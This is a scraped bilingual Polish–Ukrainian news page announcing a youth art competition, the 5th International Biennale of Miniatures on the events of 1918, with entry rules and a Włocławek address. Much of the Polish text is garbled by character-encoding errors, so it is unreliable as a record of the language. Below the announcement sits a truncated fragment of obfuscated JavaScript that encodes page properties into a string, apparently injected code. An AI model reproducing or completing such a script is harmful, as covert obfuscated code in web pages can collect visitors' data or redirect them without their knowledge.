Inline pictures
Polska 22:26
Україна 23:26

V MIA?DZYNARODOWE BIENNALE MINIATUR a�z1918 a�� poczA�tek i konieca�?

123334.jpg

Centrum Edukacji Artystycznej w Warszawie oraz Prywatna OgólnoksztaA�cA�ca SzkoA�a Sztuk PiA�knych we WA�ocA�awku zapraszajA� do konkursu V MiA�dzynarodowe Biennale miniatur.

a��Minister Kultury i Dziedzictwa Narodowego objA�A�o konkurs patronatem honorowym. Celem Biennale jest poznanie historii Polski i wzbogacenie wiedzy o wydarzeniach zwiA�zanych z wojnA� 1914-1918 w Europie. Organizatorzy zakA�adajA�, A?e Biennale stanowi doskonaA�A� okazjA� prezentacji prac mA�odych twórców inspirowanych wydarzeniami historycznymi. 

Warunki uczestnictwa:
W konkursie mogA� wziA�A� udziaA� uczniowie szkóA� artystycznych w wieku od 12 do 20 lat. Na Biennale moA?na nadsyA�aA� prace z zakresu malarstwa, grafiki, tkaniny i rzeA?by zwiA�zane tematycznie z wydarzeniami 1918 roku na ziemiach polskich i w Europie. KaA?dy uczestnik moA?e zgA�osiA� do 3 prac.
Maksymalna wielkoA�A� prac 200 x 200 x 200 mm
Technika wykonania prac – dowolna.
Prace muszA� mieA� na odwrocie przytwierdzone godA�o autora i kraj pochodzenia (godA�o powinno byA� w postaci tekstu A�aciA�skiego, litery lub cyfry, a nie znaku graficznego) oraz doA�A�czonA� do kaA?dej pracy zamkniA�tA� kopertA� z tym samym godA�em; wewnA�trz koperty naleA?y umieA�ciA� metryczkA� zgodnA� z zaA�A�cznikiem nr 1. SzkoA�y wysyA�ajA�ce prace na Biennale proszone sA� o doA�A�czenie listy uczestników. Prace naleA?y nadesA�aA� do dnia 31 marca 2018 roku na adres organizatora:


Prywatna OgólnoksztaA�cA�ca SzkoA�a Sztuk PiA�knych
ul. Zapiecek 4; 87-800 WA�ocA�awek
POLSKA

 

detali konkursu 

encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

 

Pogoda / Погода

Warszawa Варшава   
Krakow / Краків
Gdansk / Гданськ
Poznan / Познань
Lodz / Лодзь
Київ / Kijow
Львів / Lwow
Харків / Charkow
Одеса / Odesa
Донецьк / Donieck


CZYTAJ NAS W WYGODNYM FORMACIE

ЧИТАЙТЕ НАС В ЗРУЧНОМУ ФОРМАТІ